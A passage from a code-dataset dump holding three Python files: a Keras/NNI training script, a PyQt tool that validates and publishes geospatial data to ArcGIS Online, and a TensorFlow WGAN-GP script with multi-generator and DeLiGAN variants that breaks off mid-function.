keras.optimizers.SGD(lr=hyper_params['learning_rate'], momentum=0.9)\n\n model.compile(loss=keras.losses.categorical_crossentropy, optimizer=optimizer, metrics=[keras.metrics.categorical_accuracy])\n print(model.metrics_names)\n return model\n\n\nclass SendMetrics(keras.callbacks.Callback):\n '''\n Keras callback to send metrics to NNI framework\n '''\n def on_epoch_end(self, epoch, logs={}):\n '''\n Run on end of each epoch\n '''\n LOG.debug(logs) \n nni.report_intermediate_result(logs[\"dense_2_categorical_accuracy\"])\n\n\ndef train(args, params):\n '''\n Train model\n '''\n model = build_model(params)\n X_train, Y1_train, Y2_train, X_test, Y1_test, Y2_test = load_dataset(args.dataset_name, args.num_train)\n\n print('Fitting model...')\n results = model.fit(X_train, [Y1_train, Y2_train], epochs=args.epochs, verbose=1,\n validation_data=(X_test, [Y1_test, Y2_test]), callbacks=[SendMetrics(), TensorBoard(log_dir=TENSORBOARD_DIR)])\n\n _, _, _, cat_acc, subcat_acc = model.evaluate(X_test, [Y1_test, Y2_test], verbose=0)\n LOG.debug('Final result is: %d', subcat_acc)\n nni.report_final_result(subcat_acc)\n print('Final result is: %d', subcat_acc)\n\n model_id = nni.get_sequence_id()\n # serialize model to JSON\n model_json = model.to_json()\n with open(\"model-{}.json\".format(model_id), \"w\") as json_file:\n json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(\"model-{}.h5\".format(model_id))\n print(\"Saved model to disk\")\n\n\ndef generate_default_params():\n '''\n Generate default hyper parameters\n '''\n return {\n 'optimizer': 'Adam',\n 'learning_rate': 0.001\n }\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser()\n PARSER.add_argument(\"--dataset_name\", type=str,default='test_noised2x_data', help='Dataset name', required=False)\n PARSER.add_argument(\"--epochs\", type=int, default=400, help=\"Train epochs\", required=False)\n PARSER.add_argument(\"--num_train\", type=float, default=0.8,\n help=\"Part of train samples to be used, maximum 1\", required=False)\n\n ARGS, UNKNOWN = PARSER.parse_known_args()\n\n try:\n # get parameters from tuner\n RECEIVED_PARAMS = nni.get_next_parameter()\n LOG.debug(RECEIVED_PARAMS)\n PARAMS = generate_default_params()\n PARAMS.update(RECEIVED_PARAMS)\n # train\n train(ARGS, PARAMS)\n except Exception as e:\n LOG.exception(e)\n raise\n","sub_path":"NNI_models/deep_conv_for_noise2x_data/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"343991542","text":"# -*- coding: UTF-8 -*-\n\nimport sys\nfrom scripts.index import *\nfrom scripts.metadato_pdf import *\nfrom scripts.validate_file import *\nfrom scripts.function_js import *\nfrom scripts.publish_agol import *\nfrom scripts.update_xml import *\nfrom scripts.nls import *\nimport zipfile\n\n\nclass execute(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.ui.validateData.clicked.connect(self.validate)\n self.ui.uploadZip.clicked.connect(self.uploadData)\n self.ui.publishAgol.clicked.connect(self.publish2agol)\n self.ui.publishOpendata.clicked.connect(self.publish2opendata)\n self.ui.publishMetadata.clicked.connect(self.publish2metadata)\n self.ui.generateReport.clicked.connect(self.refreshData)\n self.msg = Messages()\n self.console = []\n\n self.datafile = None\n self.extent = None\n\n # Lectura de datos\n def readValues(self):\n self.dicc = {\n \"title\": u'%s' % self.ui.text01_title.text(),\n \"desc\": u'%s' % self.ui.text02_desc.toPlainText(),\n \"method\": u'%s' % self.ui.text03_method.toPlainText(),\n \"resp\": u'%s' % self.ui.text04_resp.text(),\n \"tags\": u'%s' % self.ui.text05_tags.text(),\n \"ubic\": u'%s' % self.ui.text06_ubic.text(),\n \"scale\": u'%s' % self.ui.text07_scale.text(),\n \"webpage\": u'%s' % self.ui.text08_webpage.text(),\n \"geocatmin\": u'%s' % self.ui.text09_geocatmin.text(),\n \"obs\": u'%s' % self.ui.text10_obs.toPlainText(),\n\n \"format\": u'%s' % self.ui.cb01_format.currentText(),\n \"situation\": u'%s' % self.ui.cb02_situation.currentText(),\n \"actualizacion\": u'%s' % self.ui.cb03_update.currentText(),\n \"restriccion\": u'%s' % self.ui.cb04_restr.currentText(),\n \"acceso\": u'%s' % self.ui.cb05_access.currentText(),\n \"fecha\": u'%s' % self.ui.date_edit.date().toString(\"dd / MMM / yyyy\"),\n\n \"capa\": self.ui.ch03_capa.isChecked(),\n \"wms\": self.ui.ch04_wms.isChecked(),\n \"shp\": self.ui.ch05_shp.isChecked(),\n \"kml\": self.ui.ch06_kml.isChecked(),\n \"opendata\": self.ui.ch07_opendata.isChecked(),\n \"csvxls\": self.ui.ch08_csvxls.isChecked(),\n \"other\": self.ui.ch09_other.isChecked()\n }\n\n # Validacion de datos\n def validate(self):\n self.addConsole(self.msg.initValidation)\n self.readValues()\n self.openpfile2validate()\n FichaMetadatos(self.dicc)\n\n def openpfile2validate(self):\n filetypes = \"Excel (*.xls *.xlsx);;Delimitado por comas (*.csv) ;;Shapefile (*.shp)\"\n self.datafile = str(QtGui.QFileDialog.getOpenFileName(self, \"Select file to import\", \"\", filetypes))\n self.validatefiledata(self.datafile)\n\n def validatefiledata(self, file):\n validate = readFileValidate(file)\n messages, self.extent = validate.main()\n for msg in messages:\n self.addConsole(msg)\n self.setWebMap()\n self.ui.view.reload()\n self.ui.view.show()\n\n # Adjuntar data\n def uploadData(self):\n if self.datafile != None:\n self.addConsole(\"Leyendo archivo\")\n dirname = SHPFOLDER\n self.namefile = [os.path.splitext(os.path.join(dirname, x))[0] for x in os.listdir(dirname) if\n os.path.splitext(x)[1] == \".shp\"]\n filetozip = [os.path.join(dirname, x) for x in os.listdir(dirname) if (\n os.path.splitext(os.path.join(dirname, x))[0] == self.namefile[0] or os.path.splitext(x)[1] == \".xml\") and\n os.path.splitext(x)[1] != \".zip\"]\n zp = zipfile.ZipFile(os.path.join(dirname, os.path.splitext(self.namefile[0])[0] + \".zip\"), \"w\",\n zipfile.ZIP_DEFLATED)\n [zp.write(x, os.path.basename(x)) for x in filetozip]\n self.zipfile = os.path.join(dirname, os.path.splitext(self.namefile[0])[0] + \".zip\")\n else:\n filetypes = \"Map document (*.mxd);;Map package (*.mpk);;Zip (*.zip)\"\n self.zipfile = QtGui.QFileDialog.getOpenFileName(self, \"Select file to import\", \"\", filetypes)\n self.namefile = os.path.splitext(self.zipfile)[0]\n\n # Publicar al agol\n def publish2agol(self):\n self.readValues()\n self.addConsole(\"Publicando al ArcGis Online\")\n PublishService().publishAgol(self.dicc, self.zipfile)\n\n # Publicar a Datos Abiertos\n def publish2opendata(self):\n self.addConsole(\"Compartiendo a Datos abiertos\")\n PublishService().publishOpenData()\n\n # Publicar a Metadata\n def publish2metadata(self):\n self.addConsole(\"Creando XML para Metadatos\")\n self.createXML()\n\n def setWebMap(self):\n self.addConsole(\"setWebMap\")\n code = SetJS().buildcode\n frame = self.ui.view.page().mainFrame()\n frame.evaluateJavaScript(code)\n\n def createXML(self):\n self.addConsole(\"createXML\")\n self.readValues()\n MakeMetadata(self.dicc, self.namefile, self.extent).main()\n\n # Generar reporte\n def refreshData(self):\n self.addConsole(\"refreshData\")\n self.datafile = None\n\n def addConsole(self, text):\n self.console.append(text)\n self.ui.statusValue.setText('\\n'.join(self.console))\n self.ui.statusValue.moveCursor(QtGui.QTextCursor.End)\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n window = execute()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"40997331","text":"# -*- coding: utf-8 -*-\n# python2.7\n# resolution 32x32x3\n\n\nimport os, sys\nsys.path.append(os.getcwd())\n\nimport time\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\nimport tflib as lib\nimport tflib.ops.linear\nimport tflib.ops.conv2d\nimport tflib.ops.batchnorm\nimport tflib.ops.deconv2d\nimport tflib.save_images\nimport tflib.cifar10\nimport tflib.dataloader_RAM as dataloader\nimport tflib.plot\nfrom tqdm import trange\nimport shutil\nimport functools\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--workmode',type=str,help='mode? train or generate',\n default='train',choices=['train','generate'])\nargs = parser.parse_args()\nWORKMODE = args.workmode\n\n# Download CIFAR-10 (Python version) at\n# https://www.cs.toronto.edu/~kriz/cifar.html and fill in the path to the\n# extracted files here!\nhome_dir = os.path.expanduser('~')\n# copy datasets to ~/datasets or make soft links to datasets in other places.\nDATASETS = [#name, ratio, path\n ['cifar', 1.0,home_dir + '/datasets/cifar-10-batches-py/'],\n ['mnist32', 0.0,home_dir + '/datasets/mnist32/'],\n ['fashion32', 0.0,home_dir + '/datasets/fashion_mnist32/'],\n ]\nEXP_ROOT_DIR = 'exp_output7'\nCOMMENT = 'run1'\nMODE = 'wgan-gp' # Valid options are dcgan, wgan, or wgan-gp\nARCH = 'DC' #valid options are 'DC' or 'Res'\nDDIM = 64\nGDIM = 64\nZ1DIM = 128\nLAMBDA = 5 # Gradient penalty lambda hyperparameter\nCRITIC_ITERS = 5 # How many critic iterations per generator iteration\nBATCH_SIZE = 64 # Batch size\nZ2DIM = N_SUBGEN = 10# How many sub-generators in the Generator\n# GEN_TYPE can be 'multigen' 'deligan' 'vcgan'\nGEN_TYPE = 'vcgan'\nINPLACE_COND = True\nDELTA = 3.0\n\nif GEN_TYPE == 'vcgan' and INPLACE_COND:\n Z1DIM -= N_SUBGEN\nDELIGAN_INIT_SCALE = 1.0\nITERS = 200000 # How many generator iterations to train for\nN_C,N_H,N_W = 3,32,32\nOUTPUT_DIM = int(N_C * N_H * N_W) # Number of pixels\nRELU_GP = False\nTRAIN_P_START = 2000\nTRAIN_P_PERIOD = 0 # train p every TRAIN_P_PERIOD iters. 0 to disable training p\nLR = 1e-4\nLRLD = False #enable or disable linear decay of Gen and Dis learning rate\nPLR = 0.01\nPLRDR = 0.98 #PLR decay rate\n\nCALC_INCEPTION_SCORE = False\nSAVE_CHECKPOINT_PERIOD = 10000\nSAVE_SAMPLES_PERIOD = 10000\nPREVIEW_PERIOD = 250\n\n\ndef datasets_to_str(ds):\n ds_str = ''\n for name,p,path in ds:\n if p != 0.0 and p < 1.0:\n ds_str += '-{}{}'.format(p,name)\n if p != 0.0 and p == 1.0:\n ds_str += '-{}'.format(name)\n return ds_str\n\n\nEXPERIMENT_NAME = MODE + '-' + ARCH + '-32x32-{}subgen'.format(N_SUBGEN) + \\\n '-{}'.format(GEN_TYPE) + '-lr{}'.format(LR) + ('d' if LRLD else '') +\\\n ('-rgp' if RELU_GP else '') + \\\n ('-dlis{}'.format(DELIGAN_INIT_SCALE) if GEN_TYPE == 'deligan' else '') + \\\n ('-dt{}'.format(DELTA) if GEN_TYPE == 'vcgan' else '') + \\\n '-tpp{}'.format(TRAIN_P_PERIOD) + \\\n ('-plr{}-dr{}-tps{}'.format(PLR,PLRDR,TRAIN_P_START)\\\n if TRAIN_P_PERIOD > 0 else '') + \\\n datasets_to_str(DATASETS) + '-it{}'.format(ITERS) + \\\n ('-inp_con' if GEN_TYPE == 'vcgan' and INPLACE_COND else '') +\\\n '-d{}g{}-'.format(DDIM,GDIM)+COMMENT\n\n#EXPERIMENT_DIR = os.getcwd() + '/'+ EXP_ROOT_DIR +'/' + EXPERIMENT_NAME\nEXPERIMENT_DIR = './'+ EXP_ROOT_DIR +'/' + EXPERIMENT_NAME\nCHECKPOINT_DIR = EXPERIMENT_DIR + '/checkpoint'\n\nlib.print_model_settings(locals().copy())\ndef save_src(target_file_name):\n if os.path.exists(target_file_name):\n target_file_name += '.new.py'\n with open(sys.argv[0]) as src_file:\n with open(target_file_name,mode='w') as target:\n while True:\n s = src_file.readline()\n if len(s) > 0:\n target.write(s)\n else:\n break\nif WORKMODE == 'train':\n if(os.path.isdir(EXPERIMENT_DIR)==False):\n os.makedirs(EXPERIMENT_DIR)\n \n if(os.path.isdir(CHECKPOINT_DIR)==False):\n os.makedirs(CHECKPOINT_DIR)\n save_src(EXPERIMENT_DIR + '/' + EXPERIMENT_NAME + '.py')\n \nCHECKPOINT_NAME = tf.train.latest_checkpoint(CHECKPOINT_DIR)\nif CHECKPOINT_NAME is None:\n ITER_START = 0\nelse:\n model_file_name = os.path.split(CHECKPOINT_NAME)[1]\n ITER_START = int(model_file_name[model_file_name.rfind('-')+1:]) + 1\n \n\ndef LeakyReLU(x, alpha=0.2):\n return tf.maximum(alpha*x, x)\n\ndef ReLULayer(name, n_in, n_out, inputs):\n output = lib.ops.linear.Linear(name+'.Linear', n_in, n_out, inputs)\n return tf.nn.relu(output)\n\ndef LeakyReLULayer(name, n_in, n_out, inputs):\n output = lib.ops.linear.Linear(name+'.Linear', n_in, n_out, inputs)\n return LeakyReLU(output)\n\ndef Generator_first(n_samples, noise=None,name='Generator',zd=Z1DIM):\n if noise is None:\n noise = tf.random_normal([n_samples, zd])\n\n output = lib.ops.linear.Linear('{}.Input'.format(name), zd, 4*4*4*GDIM, noise)\n output = lib.ops.batchnorm.Batchnorm('{}.BN1'.format(name), [0], output)\n output = tf.nn.relu(output)\n output = tf.reshape(output, [-1, 4*GDIM, 4, 4])\n return output\n\ndef Generator_middle(n_samples,front_results,name='Generator'):\n output = lib.ops.deconv2d.Deconv2D('{}.2'.format(name), 4*GDIM, 2*GDIM, 5, front_results)\n output = lib.ops.batchnorm.Batchnorm('{}.BN2'.format(name), [0,2,3], output)\n output = tf.nn.relu(output)\n\n output = lib.ops.deconv2d.Deconv2D('{}.3'.format(name), 2*GDIM, GDIM, 5, output)\n output = lib.ops.batchnorm.Batchnorm('{}.BN3'.format(name), [0,2,3], output)\n output = tf.nn.relu(output)\n return output\n\ndef Generator_last(n_samples,middle_results,name='Generator'):\n output = lib.ops.deconv2d.Deconv2D('{}.5'.format(name), GDIM, 3, 5, middle_results)\n output = tf.tanh(output)\n return tf.reshape(output, [-1, OUTPUT_DIM])\n\ndef DCGenerator(n_samples, noise=None,name='Generator',zd=Z1DIM):\n front_results = Generator_first(n_samples, noise,name,zd)\n middle_results = Generator_middle(n_samples,front_results,name)\n return Generator_last(n_samples,middle_results,name)\n\ndef DCDiscriminator(inputs):\n output = tf.reshape(inputs, [-1, 3, 32, 32])\n\n output = lib.ops.conv2d.Conv2D('Discriminator.1', 3, DDIM, 5, output, stride=2)\n output = LeakyReLU(output)\n\n output = lib.ops.conv2d.Conv2D('Discriminator.2', DDIM, 2*DDIM, 5, output, stride=2)\n if MODE != 'wgan-gp':\n output = lib.ops.batchnorm.Batchnorm('Discriminator.BN2', [0,2,3], output)\n output = LeakyReLU(output)\n\n output = lib.ops.conv2d.Conv2D('Discriminator.3', 2*DDIM, 4*DDIM, 5, output, stride=2)\n if MODE != 'wgan-gp':\n output = lib.ops.batchnorm.Batchnorm('Discriminator.BN3', [0,2,3], output)\n output = LeakyReLU(output)\n\n output = tf.reshape(output, [-1, 4*4*4*DDIM])\n output = lib.ops.linear.Linear('Discriminator.Output', 4*4*4*DDIM, 1, output)\n\n return tf.reshape(output, [-1])\n\ndef ConvMeanPool(name, input_dim, output_dim, filter_size, inputs, he_init=True, biases=True):\n output = lib.ops.conv2d.Conv2D(name, input_dim, output_dim, filter_size, inputs, he_init=he_init, biases=biases)\n output = tf.add_n([output[:,:,::2,::2], output[:,:,1::2,::2], output[:,:,::2,1::2], output[:,:,1::2,1::2]]) / 4.\n return output\n\ndef MeanPoolConv(name, input_dim, output_dim, filter_size, inputs, he_init=True, biases=True):\n output = inputs\n output = tf.add_n([output[:,:,::2,::2], output[:,:,1::2,::2], output[:,:,::2,1::2], output[:,:,1::2,1::2]]) / 4.\n output = lib.ops.conv2d.Conv2D(name, input_dim, output_dim, filter_size, output, he_init=he_init, biases=biases)\n return output\n\ndef UpsampleConv(name, input_dim, output_dim, filter_size, inputs, he_init=True, biases=True):\n output = inputs\n output = tf.concat([output, output, output, output], axis=1)\n output = tf.transpose(output, [0,2,3,1])\n output = tf.depth_to_space(output, 2)\n output = tf.transpose(output, [0,3,1,2])\n output = lib.ops.conv2d.Conv2D(name, input_dim, output_dim, filter_size, output, he_init=he_init, biases=biases)\n return output\n\ndef Normalize(name, inputs):\n if ('Generator' in name):\n return lib.ops.batchnorm.Batchnorm(name,[0,2,3],inputs,fused=True)\n else:\n return inputs\n\ndef ResidualBlock(name, input_dim, output_dim, filter_size, inputs, resample=None, no_dropout=False):\n \"\"\"\n resample: None, 'down', or 'up'\n \"\"\"\n if resample=='down':\n conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=input_dim)\n conv_2 = functools.partial(ConvMeanPool, input_dim=input_dim, output_dim=output_dim)\n conv_shortcut = ConvMeanPool\n elif resample=='up':\n conv_1 = functools.partial(UpsampleConv, input_dim=input_dim, output_dim=output_dim)\n conv_shortcut = UpsampleConv\n conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)\n elif resample==None:\n conv_shortcut = lib.ops.conv2d.Conv2D\n conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim)\n conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)\n else:\n raise Exception('invalid resample value')\n\n if output_dim==input_dim and resample==None:\n shortcut = inputs # Identity skip-connection\n else:\n shortcut = conv_shortcut(name+'.Shortcut', input_dim=input_dim, output_dim=output_dim, filter_size=1, he_init=False, biases=True, inputs=inputs)\n\n output = inputs\n output = Normalize(name+'.N1', output)\n output = tf.nn.relu(output)\n output = conv_1(name+'.Conv1', filter_size=filter_size, inputs=output) \n output = Normalize(name+'.N2', output)\n output = tf.nn.relu(output) \n output = conv_2(name+'.Conv2', filter_size=filter_size, inputs=output)\n\n return shortcut + output\n\ndef OptimizedResBlockDisc1(inputs):\n conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=3, output_dim=DDIM)\n conv_2 = functools.partial(ConvMeanPool, input_dim=DDIM, output_dim=DDIM)\n conv_shortcut = MeanPoolConv\n shortcut = conv_shortcut('Discriminator.1.Shortcut', input_dim=3, output_dim=DDIM, filter_size=1, he_init=False, biases=True, inputs=inputs)\n\n output = inputs\n output = conv_1('Discriminator.1.Conv1', filter_size=3, inputs=output) \n output = tf.nn.relu(output) \n output = conv_2('Discriminator.1.Conv2', filter_size=3, inputs=output)\n return shortcut + output\n\ndef ResGenerator(n_samples, noise=None,name='Generator',zd=Z1DIM):\n if noise is None:\n noise = tf.random_normal([n_samples, zd])\n output = lib.ops.linear.Linear('{}.Input'.format(name), 128, 4*4*GDIM, noise)\n output = tf.reshape(output, [-1, GDIM, 4, 4])\n output = ResidualBlock('{}.1'.format(name), GDIM, GDIM, 3, output, resample='up')\n output = ResidualBlock('{}.2'.format(name), GDIM, GDIM, 3, output, resample='up')\n output = ResidualBlock('{}.3'.format(name), GDIM, GDIM, 3, output, resample='up')\n output = Normalize('{}.OutputN'.format(name), output)\n output = tf.nn.relu(output)\n output = lib.ops.conv2d.Conv2D('{}.Output'.format(name), GDIM, 3, 3, output, he_init=False)\n output = tf.tanh(output)\n return tf.reshape(output, [-1, OUTPUT_DIM])\n\ndef ResDiscriminator(inputs):\n output = tf.reshape(inputs, [-1, 3, 32, 32])\n output = OptimizedResBlockDisc1(output)\n output = ResidualBlock('Discriminator.2', DDIM, DDIM, 3, output, resample='down')\n output = ResidualBlock('Discriminator.3', DDIM, DDIM, 3, output, resample=None)\n output = ResidualBlock('Discriminator.4', DDIM, DDIM, 3, output, resample=None)\n output = tf.nn.relu(output)\n output = tf.reduce_mean(output, axis=[2,3])\n output_wgan = lib.ops.linear.Linear('Discriminator.Output', DDIM, 1, output)\n output_wgan = tf.reshape(output_wgan, [-1])\n return output_wgan\n\nGenerator = eval('{}Generator'.format(ARCH))\nDiscriminator = eval('{}Discriminator'.format(ARCH))\n\n\ndef print_model_size(tag='',var_list=None):\n total_parameters = 0\n if var_list == None:\n # count all variables\n var_list = tf.trainable_variables()\n for variable in var_list:\n local_parameters = 1\n shape = variable.get_shape() # getting shape of a variable\n for i in shape:\n local_parameters *= i.value # mutiplying dimension values\n total_parameters += local_parameters\n string = tag + \" param size: {:.6f}M \\n\".format(total_parameters / 1.0e6)\n print(string)\n if WORKMODE == 'train':\n with open(EXPERIMENT_DIR + '/' + 'info.txt',mode='a') as f:\n f.write(string + '\\n')\n\nreal_data_int = tf.placeholder(tf.int32, shape=[BATCH_SIZE, OUTPUT_DIM])\nreal_data = 2*((tf.cast(real_data_int, tf.float32)/255.)-.5)\n\n\nz1 = tf.random_normal([BATCH_SIZE, Z1DIM])\nz2 = tf.random_uniform([BATCH_SIZE, N_SUBGEN],1e-8,1-1e-8)# sample uniform instead of applying invers norm CDF, for convinence\n\np_logits = tf.get_variable('p_logits',shape=[N_SUBGEN],dtype=tf.float32,initializer=tf.zeros_initializer())# p_logits are the q_i s in the Paper\np = tf.nn.softmax(p_logits)\nF = tf.one_hot(tf.argmax(tf.log(p)-tf.log(-tf.log(z2)),axis=1),depth=N_SUBGEN)\n\n#define model\n#define model\n#define model\n#define model\n#define model\n\ndef bias_fn(z1dim=100,N=10,delta=2):\n if delta < 0.02:\n return 0\n u = (2 * z1dim) ** 0.5 + delta * (1 - 1.0 / (8 * z1dim)) ** 0.5 - 1.0 / (8 * z1dim) ** 0.5\n hs = (u + (u ** 2 + delta * (32 * z1dim) ** 0.5) ** 0.5) ** 2 / 8.0 - z1dim\n b = -1.0 / N * (hs) ** 0.5\n return b\n\nif GEN_TYPE == 'multigen':\n fake_datas_list = [Generator(BATCH_SIZE, z1, 'Generator{}'.format(i)) \\\n for i in range(N_SUBGEN)]\n\n fake_datas = tf.stack(fake_datas_list, axis=2)\n fake_data = tf.squeeze(tf.matmul(fake_datas, tf.expand_dims(F, axis=2)))\nelif GEN_TYPE == 'vcgan':\n bias = bias_fn(Z1DIM,N_SUBGEN,DELTA)\n scale = -bias * N_SUBGEN or 1.0 #when DELTA=0, set scale=1.0, equivalent to common one-hot condition\n print(\"bias={:.4f}, scale={:.4f}\".format(bias,scale))\n # bias = 0\n # scale = 1\n new_z = tf.concat([z1, F * scale + bias], 1)\n new_z_n = tf.transpose([tf.concat([z1, \\\n tf.one_hot(np.ones((BATCH_SIZE), np.float) * i, depth=N_SUBGEN) * scale + bias],1) \\\n for i in range(N_SUBGEN)], (1, 2, 0))\n fake_data = Generator(BATCH_SIZE, new_z, 'Generator', zd=Z1DIM + N_SUBGEN)\nelif GEN_TYPE == 'deligan':\n deligan_biases = tf.get_variable('deligan_biases',\n shape=[Z1DIM, N_SUBGEN], dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-1, 1))\n deligan_scales_sqrt = tf.get_variable('deligan_scales_sqrt',\n shape=[Z1DIM, N_SUBGEN], dtype=tf.float32,\n initializer=tf.constant_initializer(DELIGAN_INIT_SCALE ** 0.5))\n\n deligan_scales = deligan_scales_sqrt ** 2 + 1e-8\n z1_copies = tf.transpose([z1 for i in range(N_SUBGEN)], [1, 2, 0])\n deligan_noise_n = deligan_scales * z1_copies + deligan_biases\n deligan_noise = tf.squeeze(tf.matmul(deligan_noise_n, tf.expand_dims(F, axis=2)))\n\n fake_data = Generator(BATCH_SIZE, deligan_noise, 'Generator')\n\ndisc_real = Discriminator(real_data)\n\ndisc_fake = Discriminator(fake_data)\n\n\nEDGs = tf.placeholder(tf.float32,shape=[N_SUBGEN]) # [E[D(G_i(z))],]\np_loss = -tf.reduce_sum(p * EDGs)\nglobal_step = tf.placeholder(tf.int32,shape=None)\np_lr = tf.train.exponential_decay(PLR,global_step=global_step,\n decay_steps=1000,decay_rate=PLRDR)\np_train_op = tf.train.GradientDescentOptimizer(p_lr).minimize(p_loss,var_list=[p_logits])\n#p_train_op = tf.train.AdamOptimizer(PLR).minimize(p_loss,var_list=[p_sqrt])\n\nif LRLD:\n LRx = tf.maximum(0., 1.-(tf.cast(global_step, tf.float32) / ITERS)) * LR\nelse:\n LRx = LR\n\ngen_params = lib.params_with_name('Generator')\ndisc_params = lib.params_with_name('Discriminator')\n\nif GEN_TYPE == 'deligan':\n gen_params += [deligan_scales_sqrt ,deligan_biases]\n#Todo: Here\n\nif MODE == 'wgan-gp':\n # Standard WGAN loss\n gen_cost = -tf.reduce_mean(disc_fake)\n disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)\n\n # Gradient penalty\n alpha = tf.random_uniform(\n shape=[BATCH_SIZE,1],\n minval=0.,\n maxval=1.\n )\n differences = fake_data - real_data\n interpolates = real_data + (alpha*differences)\n gradients = tf.gradients(Discriminator(interpolates), [interpolates])[0]\n slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), axis=[1]))\n gradient_penalty = tf.reduce_mean((tf.nn.relu(slopes-1.))**2) if RELU_GP else tf.reduce_mean((slopes-1.)**2)\n disc_cost += LAMBDA*gradient_penalty\n gen_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5, beta2=0.9).minimize(gen_cost, var_list=gen_params)\n disc_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5, beta2=0.9).minimize(disc_cost, var_list=disc_params)\n\nelif MODE == 'dcgan':\n gen_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_fake, labels=tf.ones_like(disc_fake)))\n disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_fake, labels=tf.zeros_like(disc_fake)))\n disc_cost += tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_real, labels=tf.ones_like(disc_real)))\n disc_cost /= 2.\n gen_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5).minimize(gen_cost,var_list=gen_params)\n disc_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5).minimize(disc_cost,var_list=disc_params)\n\n# For generating samples\n# fixed_noise_128 = tf.constant(np.random.normal(size=(128, Z1DIM)).astype('float32'))\nN_SAMPLE_PER_SUBGEN = int(N_SUBGEN * np.ceil(8.0 / N_SUBGEN) ** 2)\nN_TOTAL_SAMPLE = N_SAMPLE_PER_SUBGEN * N_SUBGEN\nif CHECKPOINT_NAME is None:\n common_fixed_noise_ = np.random.normal(size=(N_SAMPLE_PER_SUBGEN, Z1DIM)).astype('float32')\n np.save(CHECKPOINT_DIR + '/common_fixed_noise',common_fixed_noise_)\nelse:\n common_fixed_noise_ = np.load(CHECKPOINT_DIR + '/common_fixed_noise.npy')\ncommon_fixed_noise = tf.constant(common_fixed_noise_)\n\nfixed_F = tf.one_hot(np.linspace(0, N_SUBGEN, num=N_TOTAL_SAMPLE, endpoint=False).astype('int32'), depth=N_SUBGEN)\nif GEN_TYPE == 'multigen':\n fixed_fake_datas_list = [Generator(N_SAMPLE_PER_SUBGEN, common_fixed_noise, 'Generator{}'.format(i)) for i in\n range(N_SUBGEN)]\n fixed_noise_samples = tf.stack(fixed_fake_datas_list, axis=0)\nelif GEN_TYPE == 'vcgan':\n fixed_new_z = tf.concat([tf.constant(np.resize(common_fixed_noise_, \\\n (N_TOTAL_SAMPLE, Z1DIM))), fixed_F * scale + bias], 1)\n fixed_noise_samples = Generator(N_TOTAL_SAMPLE, fixed_new_z, 'Generator', zd=Z1DIM + N_SUBGEN)\n\nelif GEN_TYPE == 'deligan':\n fixed_deligan_noise = tf.concat([common_fixed_noise_ * deligan_scales[:, i] + \\\n deligan_biases[:, i] for i in range(N_SUBGEN)], 0)\n\n fixed_noise_samples = Generator(Z1DIM, fixed_deligan_noise, 'Generator')\n\n\ndef generate_image(frame):\n samples = session.run(fixed_noise_samples)\n samples = ((samples + 1.) * (255. / 2)).astype('int32')\n lib.save_images.save_images(samples.reshape((N_TOTAL_SAMPLE, N_C, N_H, N_W)), \\\n EXPERIMENT_DIR + '/' + 'samples_{}.png'.format(frame))\n\n#low-ram-usage version\ndef save_samples_to_npz(n_samples=50000, step=1,return_samples=False):\n all_samples = []\n for i in trange(int(np.ceil(n_samples * 1.0 / BATCH_SIZE))):\n all_samples.append(((session.run(fake_data) + 1.) * (255. / 2)).astype('uint8'))\n all_samples = np.concatenate(all_samples, axis=0)[:n_samples]\n all_samples = all_samples.reshape((-1, N_C, N_H, N_W)).transpose(0, 2, 3, 1)\n file_name = '{}_samples_iter{}'.format(n_samples,step)\n while True:\n try:\n #np.savez_compressed(EXPERIMENT_DIR + '/', all_samples)\n #saving to /tmp/ and then moving to dst may save time when dst is \n #a network position\n np.savez_compressed('/tmp/' + EXPERIMENT_NAME + file_name,all_samples)\n ret = os.system('cp '+'/tmp/' + EXPERIMENT_NAME + file_name + \n '.npz '+EXPERIMENT_DIR + '/' + file_name + '.npz')\n if ret != 0:\n print(\"error in cp!\")\n continue\n os.remove('/tmp/' + EXPERIMENT_NAME + file_name + '.npz')\n break\n except OSError as e:\n print(\"OSError when saving log, retry after 60s\")\n print(e)\n time.sleep(60)\n except IOError as e:\n print(\"IOError when saving log, retry after 60s\")\n print(e)\n time.sleep(60) \n # to load the array,use \"np.load('xxx.npz.)['arr_0']\"\n if not return_samples:\n all_samples = None\n return all_samples \n\n\ndef get_inception_score(iters, samples):\n score_and_std = lib.inception_score.get_inception_score( \\\n list(samples), bs=16)\n with open(EXPERIMENT_DIR + '/' + 'inception_score.txt', mode='a') as f:\n f.write('{} {} {}\\n'.format(iters, score_and_std[0], score_and_std[1]))\n return score_and_std\n\n\ndef make_dataset_gen(ds):\n p_list = []\n gen_list = []\n\n def 